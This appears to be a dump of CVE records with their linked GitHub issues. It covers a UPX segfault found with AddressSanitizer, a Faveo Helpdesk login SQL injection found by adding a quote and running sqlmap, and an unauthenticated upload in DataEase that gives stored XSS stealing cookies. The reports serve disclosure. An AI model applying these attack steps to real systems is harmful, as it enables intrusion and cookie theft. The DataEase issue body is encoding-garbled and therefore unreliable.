/home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:1008 #7 0x4f34b2 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:194 #8 0x4f50f9 in PackMaster::getUnpacker(InputFile*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:248 #9 0x4f521f in PackMaster::unpack(OutputFile*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:266 #10 0x52a1e6 in do_one_file(char const*, char*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:160 #11 0x52a69e in do_files(int, int, char**) /home/test/Desktop/EVAULATION/upx/src/work.cpp:271 #12 0x403ace in main /home/test/Desktop/EVAULATION/upx/src/main.cpp:1538 #13 0x7fc4129b682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #14 0x404828 in _start (/home/test/Desktop/EVAULATION/upx/src/upx.out+0x404828) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/test/Desktop/EVAULATION/upx/src/bele_policy.h:193 get_le64(void const*) ==113201==ABORTING ``` The essential cause of the bug is at PackLinuxElf64 :: elf_lookup () at p_lx_elf: 5423: ```cpp upx_uint64_t const w = get_te64(&bitmask[(n_bitmask -1) & (h>>6)]); ``` ## What should have happened? Decompress a crafted/suspicious file. ## Do you have an idea for a solution? We are very grateful to @jreiser for patching the bucket in p_lx_elf.cpp in the [issue 367](https://github.com/upx/upx/issues/365). However, in fact, all places involving get_te64 () should be strengthened in upx, especially in p_lx_elf.cpp. The position we reported should be patched at least: position in PackLinuxElf64::elf_lookup() at p_lx_elf:5423 ```cpp upx_uint64_t const w = get_te64(&bitmask[(n_bitmask -1) & (h>>6)]); ``` ## How can we reproduce the issue? 1. compile upx with address-sanitize 2. execute cmd ```bash upx.out -df $PoC -o /dev/null ``` [Poc](https://github.com/14isnot40/vul_discovery/blob/master/upx/df/hbo_PackLinuxElf64__elf_lookup5423) can be found here. ## Please tell us details about your environment. * UPX version used (`upx --version`): ```bash upx 4.0.0-git-c6b9e3c62d15 (latest-devel-branch) UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 ``` * Host Operating System and version: Ubuntu 16.04 64-bit * Host CPU architecture: Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz with 8GB * Target Operating System and version: same as Host * Target CPU architecture: same as Host
[bug] segv fault in get_le64()
https://api.github.com/repos/upx/upx/issues/381/comments
2
2020-05-23T14:28:34Z
2023-04-17T18:34:13Z
https://github.com/upx/upx/issues/381
623,671,725
381
4,885
CVE-2023-25350
2023-03-24T20:15:15.403
Faveo Helpdesk 1.0-1.11.1 is vulnerable to SQL Injection. When the user logs in through the login box, he has no judgment on the validity of the user's input data. The parameters passed from the front end to the back end are controllable, which will lead to SQL injection.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Whitehat-Su/8402323c00ea93b4abc21ab9a372101e" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ladybirdweb/faveo-helpdesk/issues/7827" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Whitehat-Su/8402323c00ea93b4abc21ab9a372101e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ladybirdweb/faveo-helpdesk/issues/7827" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ladybirdweb:faveo_helpdesk:*:*:*:*:*:*:*:*", "matchCriteriaId": "3399E631-787E-4EA7-AC43-19BB79B1A9BC", "versionEndExcluding": null, "versionEndIncluding": "1.11.1", "versionStartExcluding": null, "versionStartIncluding": "1.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ladybirdweb/faveo-helpdesk/issues/7827
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ladybirdweb", "faveo-helpdesk" ]
I don't know which version of SQL injection vulnerability exists, but I found that there are SQL injection vulnerabilities in thousands of IP addresses on the cyberspace mapping platform. When logging in, the email account xxx@xx.xx After that, add ', there are SQL statement errors, which will lead to SQL injection vulnerability. Use the Burpsuite network packet capturing tool to capture the POST data packets when users log in, and use the Sqlmap tool for SQL injection. As this picture show๏ผš ![1](https://user-images.githubusercontent.com/88339450/216277141-34aa85ff-05e5-45aa-8c74-378b1265caf2.png) ![2](https://user-images.githubusercontent.com/88339450/216277192-0ddefe9e-5e79-44fb-baa8-ed4b02ea0235.png)
Faveo Helpdesk has SQL injection vulnerability
https://api.github.com/repos/faveosuite/faveo-helpdesk/issues/7827/comments
0
2023-02-02T08:56:44Z
2023-03-29T04:47:15Z
https://github.com/faveosuite/faveo-helpdesk/issues/7827
1,567,601,975
7,827
4,886
CVE-2023-28435
2023-03-24T21:15:06.860
Dataease is an open source data visualization and analysis tool. The permissions for the file upload interface is not checked so users who are not logged in can upload directly to the background. The file type also goes unchecked, users could upload any type of file. These vulnerabilities has been fixed in version 1.18.5.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 2.5, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dataease/dataease/issues/4798" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/dataease/dataease/security/advisories/GHSA-625h-q3g9-rffc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dataease/dataease/issues/4798" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/dataease/dataease/security/advisories/GHSA-625h-q3g9-rffc" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*", "matchCriteriaId": "2A6525A4-9AFC-4166-83A7-7986DA122308", "versionEndExcluding": "1.18.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/dataease/dataease/issues/4798
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "dataease", "dataease" ]
**DataEase ็‰ˆๆœฌ** v1.18.4 **Bug ๆ่ฟฐ** ๆ–‡ไปถไธŠไผ ๆœชไฝœๆƒ้™ๆ ก้ชŒ๏ผŒๆœช็™ปๅฝ•็”จๆˆทๅฏไปฅ็›ดๆŽฅๅ‘ๅŽๅฐไธŠไผ ไปปๆ„ๆ–‡ไปถ๏ผŒๆ–‡ไปถ็ฑปๅž‹ๆœชไฝœๆ ก้ชŒ๏ผŒๅฏไปฅไธŠไผ ไปปๆ„็ฑปๅž‹ๆ–‡ไปถ **Bug ้‡็Žฐๆญฅ้ชค** ๆผๆดžๆŽฅๅฃ๏ผšstatic/resource/upload/ 1. ๅ‘static/resource/upload/ๆŽฅๅฃไธŠไผ ไธ€ไธชhtml๏ผŒhtmlไธญ็š„js็”จไบŽๅผนๅ‡บcookie๏ผŒๆˆ‘ๆŠŠcookieๅˆ ้™คไบ†๏ผŒไปป็„ถๅฏไปฅไธŠไผ ๆˆๅŠŸ ![image](https://user-images.githubusercontent.com/94107024/225582741-ffb56926-5e24-4ab6-8dae-a1068f1b5b09.png) 3.ไธŠไผ ๆ–‡ไปถๅไธบb1ace870-c3d6-11ed-9218-a9fe7c2f5491๏ผŒๆ–‡ไปถๅไธ้‡ๅคๅณๅฏ 4.ๆ–‡ไปถไธŠไผ ๅŽๅญ˜ๅ‚จๅœจไบ†static-resource็›ฎๅฝ•๏ผŒ่ฎฟ้—ฎhttp://192.168.253.1:8091/static-resource/b1ace870-c3d6-11ed-9218-a9fe7c2f5491.html ๅผนๅ‡บไบ†cookieไฟกๆฏ๏ผŒๅฝขๆˆๅญ˜ๅ‚จXSSๆผๆดž ![image](https://user-images.githubusercontent.com/94107024/225583171-3a5d7da3-abd5-4850-8a44-6e242140e3f6.png)
[Bug] ๆœชๆŽˆๆƒไธŠไผ ๆ–‡ไปถๅฏผ่‡ดXSSๆผๆดž
https://api.github.com/repos/dataease/dataease/issues/4798/comments
2
2023-03-16T10:07:07Z
2023-03-24T01:29:07Z
https://github.com/dataease/dataease/issues/4798
1,627,123,885
4,798
4,887